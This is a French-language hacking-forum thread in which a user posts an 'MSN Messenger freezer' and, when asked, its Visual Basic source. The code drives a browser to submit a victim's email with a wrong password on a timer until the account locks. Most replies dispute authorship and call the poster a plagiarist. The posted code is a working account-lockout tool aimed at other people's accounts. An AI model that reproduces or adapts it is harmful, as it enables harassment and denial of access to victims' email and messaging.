Messenger Freezer 2010

Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Dec 14, 2009
89
0
566
Coucou j'aimerais bien présenter un autre de mes projets finis :hap:

C'est un messenger freezer , c'est a dire que sa bloque l'adresse msn de quelqu'un et que on ne sais plus accéder a ses mails ou autres :

:quoi: Une petite vidéo , pour montrer ? ( Car je n'ai pas compris , le principe ... )

Mais biensur :eeh:

[ZOOMBOX]http://www.youtube.com/watch?v=shC3p1y4nvA[/ZOOMBOX]

Ps : C'est coder en Visual Basic

[Et je sais pas si c'est authoriser de poster sur le forum des messenger freezer , si c'est interdit je le supprime tout de suite.]

Last edited:

Evaelis

La Voix de la Sagesse
V
Ancien staff
Apr 28, 2010
22,949
468
1,699
Valhalla
Pourrais-je avoir le code source car j'avoue que je suis perplexe ^^
Juste un morceau pas la solution ça iras

n0way

Membre actif
Nov 21, 2010
311
0
581
Earth
Hunter? MrCoderz ?

Je te soupçonne d'être un imposteur. J'ai un sérieux doute.... sur le fait que c'est toi qui l'ai fait.

Evaelis

La Voix de la Sagesse
V
Ancien staff
Apr 28, 2010
22,949
468
1,699
Valhalla
ça sent le fake
C'est moi ou l'erreur et en Chinois / russe / arabe XD

Evaelis

La Voix de la Sagesse
V
Ancien staff
Apr 28, 2010
22,949
468
1,699
Valhalla
Fake quand le mot de passe est faux il mets 10 lettres alors que quand il est bon c'est 11

Dec 14, 2009
89
0
566
Pourrais-je avoir le code source car j'avoue que je suis perplexe ^^
Juste un morceau pas la solution ça iras

Tiens y'avais qu'as demander ...J'ai plus mon project donc j'ai plus que mon application mais je l'ai réécris environs .. comme je m'en souvenais ..

Code:
Imports System.Threading.Thread
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        WebBrowser1.Navigate("http://mobile.msn.com/hm/folder.phpx")

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Enabled = True
        Label3.Text = "Freezing..."
    End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        On Error GoTo errordetected
        WebBrowser1.Document.GetElementById("LoginTextBox").SetAttribute("value", (TextBox1.Text))
        WebBrowser1.Document.GetElementById("PasswordTextBox").SetAttribute("value", ("pas13465"))
        Sleep(2000)
        WebBrowser1.Document.GetElementById("PasswordSubmit").InvokeMember("click")

GoTo done
errordetected:
        Label3.Text = "Frozen!"
        WebBrowser1.Navigate("http://mobile.msn.com/hm/folder.phpx")
done:

End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        Label3.Text = "Ready"
        MsgBox("MSN UnFrozen!")
        Timer1.Enabled = False
    End Sub

Hunter? MrCoderz ?

Je te soupçonne d'être un imposteur. J'ai un sérieux doute.... sur le fait que c'est toi qui l'ai fait.

MrCoder'z est mon compte sur Youtube tu peux vérifier.

fake il tape juste mal son mot de passe FAKE

Rien n'est fake , notre ami n0way a deviner tout seul ..
Tapper trop de faux mot de passe, ca freeze le compte.

n0way

Membre actif
Nov 21, 2010
311
0
581
Earth
mathis, ne retire pas ce que tu as dis ;)

Une mini recherche sur google, et je retrouve ta source partout sur des forums :

exemple ici Posté le: Sam 27 Mar - 10:35 : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

ici : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! (en cache tellement c'est vieux)

Je te dénigre ! Imposteur !
n0way

P.S : T'aurais au moins pu avoir l'honnêteté de dire que ce n'était pas de toi. C'est pitoyable et totalement décevant, depuis quelques temps j'observais ce que tu postais ... je sentais bien que quelque chose clochait en toi.
De plus est ! je me demande bien ce que tu espérais gagné en faisant cela. De la reconnaissance ?

Last edited:
Dec 14, 2009
89
0
566
De plus est ! je me demande bien ce que tu espérais gagné en faisant cela. De la reconnaissance ?

Je n’espère rien gagner :arf: Je veux juste partager rien de plus.

Une mini recherche sur google, et je retrouve ta source partout sur des forums :

exemple ici Posté le: Sam 27 Mar - 10:35 : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

ici : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! (en cache tellement c'est vieux)

Oui , je te dis que je me suis baser sur cette source , mais si tu as télécharger mon programme ou que tu as vu , il y'a une différence qui peut toujours aider une personne. Le button "Open Messenger"
qui est du Shell. Je ne posterais jamais un programme vraiment mais vraiment identique...J'avoue que sa ne peut pas être important , mais sa diffère toujours du code source de base ... Enfin bref,pour ceux qui sont intéresser pour le Shell :
Code:
Shell("C:\Program Files\Windows Live\Messenger\msnmsgr.exe")

n0way

Membre actif
Nov 21, 2010
311
0
581
Earth
Tu as copié la source ...

Elle est totalement identique, ajouté un bouton n'est pas "un de tes projets".
Tu as juste rajouter un ShellExecute() , même ma grand mère serait le faire.

Tu ne peux pas dire "je viens de finir un projet" ou quelque chose dans le même genre, en ayant ajouté juste un bouton dans un code source...

Tu n'a rien fait.

Je suis presque sur que tu n'aurais même pas pu expliquer pourquoi la source passe par mobile.msn et non pas par live... ou encore expliquer pourquoi on tape des faux mot de passe (avant que je l'explique quelques posts plus haut).

Ce projet comme tu dis n'en est pas un. C'est simplement et tout bonnement un ScriptKiddie (qui de plus est, n'est pas à toi, ni de toi) auquel tu as rajouté un simple BUTTON avec un ShellExecute dessus, tu veux que je te félicite pour ca ? Non merci.

Tu ne merites pas que ce post reste.

Cordialement,
n0way

n0way

Membre actif
Nov 21, 2010
311
0
581
Earth
Arrête ! Il t'a sortie le "j'ai ajouté un bouton" ... mdr' !

Mathis, je décompile ta source de ton "My Editor" par exemple je récupère toute la source, et je rajoute juste un bouton qui fait un pov' ShellExecute, et tu diras pas que j'ai volé la source?!

Incroyable !
n0way

May 1, 2010
524
0
581
Je suis totalement d'accord avec n0way ... Exactement la meme chose, c'est pitoyable Désolé ...

Ce forum est remplit de lamer qui ce croit des hacker sa me désole surtout qu'on y trouve un bon contenu et le personnel est plutot présent.

Rajouter une bouton et dire "C'est mon programme qui hack tout", digne d'un gamin c'est desolant de voir des personnes comme ca ... Bien tout ce que je deteste.

Bien pour sa que je mets rarement des choses que j'ai créé sur ce forum, c'est dommage mais je sais que si je met un programme le lendemain ou 1h plus tard je retrouverais le meme programme avec un "By machin", la vous allez dire que j'abuse mais non pas du tout plusieurs fois on retrouve les memes programmes en 1 semaine 10 personnes on fait la meme chose c'est etonnant =/
Je ne citerais pas de nom (mais j'ai mes tetes ;)) =)

Le pire c'est que sa demande le grade de programmeur ...

Encore une fois c'est bien dommage, bref ne le prend pas pour toi miika mais les lamers c'est la seul chose que je deteste ...